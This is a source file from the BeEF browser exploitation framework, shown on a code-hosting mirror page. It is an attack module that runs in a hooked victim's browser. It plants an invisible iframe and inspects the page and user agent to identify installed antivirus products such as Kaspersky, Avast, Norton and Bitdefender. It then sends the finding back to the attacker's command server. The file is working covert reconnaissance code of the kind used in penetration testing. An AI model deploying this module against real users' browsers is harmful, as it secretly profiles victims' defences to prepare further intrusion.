Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/host/detect_antivirus/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
    //Detection of av elements starts

10
        var image = "<body><img src='x'/></body>";

11
        var hidden_iframe = beef.dom.createInvisibleIframe();

12
        hidden_iframe.setAttribute("id", "frmin");

13
        document.body.appendChild(hidden_iframe);

14
        var kaspersky_iframe = hidden_iframe.contentDocument || hidden_iframe.contentWindow.document;

15
        kaspersky_iframe.open();

16
        kaspersky_iframe.write(image);

17
        kaspersky_iframe.close();

18


19
        var frm = document.getElementById("frmin");

20
        ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;

21
        var AV = document.getElementById("abs-top-frame");

22
        var NAV = document.getElementById("coFrameDiv");

23
        var ASWregexp = new RegExp("ASW\/");

24
    //Detection of av elements ends

25


26
	if (ASWregexp.test(navigator.userAgent))

27
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avast');

28
    if (ka.indexOf("kasperskylab_antibanner") !== -1)

29
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky');

30
    else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)

31
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Bitdefender');

32
    else if (AV !== null) {

33
        if (AV.outerHTML.indexOf('/html/top.html') >= 0 & AV.outerHTML.indexOf('chrome-extension://') >= 0)

34
            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avira');

35
    } else if (NAV !== null) {

36
        var nort = NAV.outerHTML;

37
        if (nort.indexOf('coToolbarFrame') >= 0 & nort.indexOf('/toolbar/placeholder.html') >= 0 & nort.indexOf('chrome-extension://') >= 0)

38
            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Norton');

39
    } else if (document.getElementsByClassName('drweb_btn').length > 0)

40
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=DrWeb');

41
    else beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Not Detected');

42


43
});

44


45